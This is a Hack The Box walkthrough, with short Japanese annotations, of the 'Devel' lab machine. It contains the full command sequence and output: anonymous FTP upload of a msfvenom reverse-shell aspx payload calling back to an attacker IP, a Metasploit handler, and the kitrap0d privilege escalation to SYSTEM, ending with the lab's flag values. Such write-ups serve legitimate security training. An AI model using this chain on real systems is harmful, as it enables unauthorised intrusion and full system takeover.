Hack The Box – Devel – Walkthrough

FTPとHTTPが公開されている

# nmap -A -n -F -T5 devel.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 07:44 UTC
Nmap scan report for devel.htb (10.10.10.5)
Host is up (0.044s latency).
Not shown: 98 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst:
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7

FTPアクセスしてみると、ドキュメントルートが公開されている

リバースシェルを取得するaspxファイルを設置する

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.13 LPORT=1234 -f aspx > reverse.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 341 bytes
Final size of aspx file: 2788 bytes

# ftp devel.htb
Connected to devel.htb.
220 Microsoft FTP Service
Name (devel.htb:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> passive
Passive mode on.
ftp> put reverse.aspx
local: reverse.aspx remote: reverse.aspx
227 Entering Passive Mode (10,10,10,5,192,10).
125 Data connection already open; Transfer starting.
226 Transfer complete.
2824 bytes sent in 0.00 secs (5.7918 MB/s)

リバースシェルを受け付けるが、ユーザフォルダにはアクセスできない

# msfconsole
msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.10.14.13
LHOST => 10.10.14.13
msf5 exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 0.0.0.0:1234
[*] Sending stage (176195 bytes) to 172.17.0.1
[*] Meterpreter session 1 opened (172.17.0.2:1234 -> 172.17.0.1:37972) at 2020-08-10 14:42:31 +0000

meterpreter > getuid
Server username: IIS APPPOOL\Web
meterpreter > shell
Process 3828 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\web
c:\windows\system32\inetsrv>cd c:\Users
cd c:\Users
c:\Users>cd babis
cd babis
Access is denied.

local_exploit_suggesterを利用して脆弱性を探す

meterpreter > bg
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf5 post(multi/recon/local_exploit_suggester) > exploit

[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 34 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

ms10_015_kitrap0dを使って攻略する

msf5 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/ms10_015_kitrap0d) > set LHOST 10.10.14.13
LHOST => 10.10.14.13
msf5 exploit(windows/local/ms10_015_kitrap0d) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/ms10_015_kitrap0d) > exploit

[-] Handler failed to bind to 10.10.14.13:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Launching notepad to host the exploit...
[+] Process 4020 launched.
[*] Reflectively injecting the exploit DLL into 4020...
[*] Injecting exploit into 4020 ...
[*] Exploit injected. Injecting payload into 4020...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (176195 bytes) to 172.17.0.1
[*] Meterpreter session 3 opened (172.17.0.2:4444 -> 172.17.0.1:42604) at 2020-08-10 15:19:11 +0000

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 596 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>cd c:\Users
cd c:\Users
c:\Users>type babis\Desktop\user.txt.txt
type babis\Desktop\user.txt.txt
9ecdd6a3aedf24b41562fea70f4cb3e8
c:\Users>type administrator\Desktop\root.txt
type administrator\Desktop\root.txt
The system cannot find the file specified.

c:\Users>type administrator\Desktop\root.txt.txt
type administrator\Desktop\root.txt.txt
e621a0b5041708797c4fc4728bc72b4b

参考

【Hack The Box】Devel Walkthrough